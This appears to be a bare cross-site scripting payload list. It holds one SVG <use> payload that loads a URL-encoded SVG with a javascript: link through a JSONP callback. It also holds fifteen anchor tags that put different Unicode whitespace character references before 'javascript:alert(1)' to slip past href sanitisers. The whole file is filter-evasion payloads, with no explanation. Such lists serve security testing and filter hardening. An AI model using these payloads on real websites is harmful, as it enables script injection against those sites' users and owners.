<svg xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="test.json?callback=%3Csvg%20id
%3D%27rectangle%27%20xmlns%3D%27http%3A//www.w3.org/2000/svg%27%20xmlns%3Axlink%3D
%27http%3A//www.w3.org/1999/xlink%27%20width%3D%27100%27%20height%3D%27100%27%3E
%3Ca%20xlink%3Ahref%3D%27javascript%3Aalert%28location%29%27%3E%3Crect%20x%3D
%270%27%20y%3D%270%27%20width%3D%27100%27%20height%3D%27100%27%20/%3E%3C/a
%3E%3C/svg%3E#rectangle"></use></svg>
<a href="&#x3000;javascript:alert(1)">click me</a>
<a href="&#5760;javascript:alert(1)">click me</a>
<a href="&#8195;javascript:alert(1)">click me</a>
<a href="&#8199;javascript:alert(1)">click me</a>
<a href="&#8232;javascript:alert(1)">click me</a>
<a href="&#8192;javascript:alert(1)">click me</a>
<a href="&#8196;javascript:alert(1)">click me</a>
<a href="&#8200;javascript:alert(1)">click me</a>
<a href="&#8287;javascript:alert(1)">click me</a>
<a href="&#8193;javascript:alert(1)">click me</a>
<a href="&#8197;javascript:alert(1)">click me</a>
<a href="&#8201;javascript:alert(1)">click me</a>
<a href="&#8194;javascript:alert(1)">click me</a>
<a href="&#8198;javascript:alert(1)">click me</a>
<a href="&#8202;javascript:alert(1)">click me</a>

